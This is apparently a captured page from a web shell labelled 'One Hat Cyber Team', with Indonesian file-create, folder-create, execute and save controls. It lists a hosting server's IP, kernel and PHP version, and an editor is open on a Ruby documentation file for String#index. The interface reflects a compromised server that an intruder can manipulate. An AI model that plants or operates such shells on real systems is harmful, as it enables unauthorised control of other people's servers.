⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby19
/
share
/
ri
/
1.9.1
/
system
/
String
/
Edit File: index-i.ri
U:RDoc::AnyMethod[iI" index:ETI"String#index;FF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"OReturns the index of the first occurrence of the given <i>substring</i> or;TI"Kpattern (<i>regexp</i>) in <i>str</i>. Returns <code>nil</code> if not;TI"Pfound. If the second parameter is present, it specifies the position in the;TI" string to begin the search.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [ I"*"hello".index('e') #=> 1 ;FI"*"hello".index('lo') #=> 3 ;FI","hello".index('a') #=> nil ;FI"*"hello".index(?e) #=> 1 ;FI")"hello".index(/[aeiou]/, -3) #=> 4;F: @file0I"lstr.index(substring [, offset]) -> fixnum or nil str.index(regexp [, offset]) -> fixnum or nil ;T0[ I"(p1, p2 = v2);FI" string.c;T
Simpan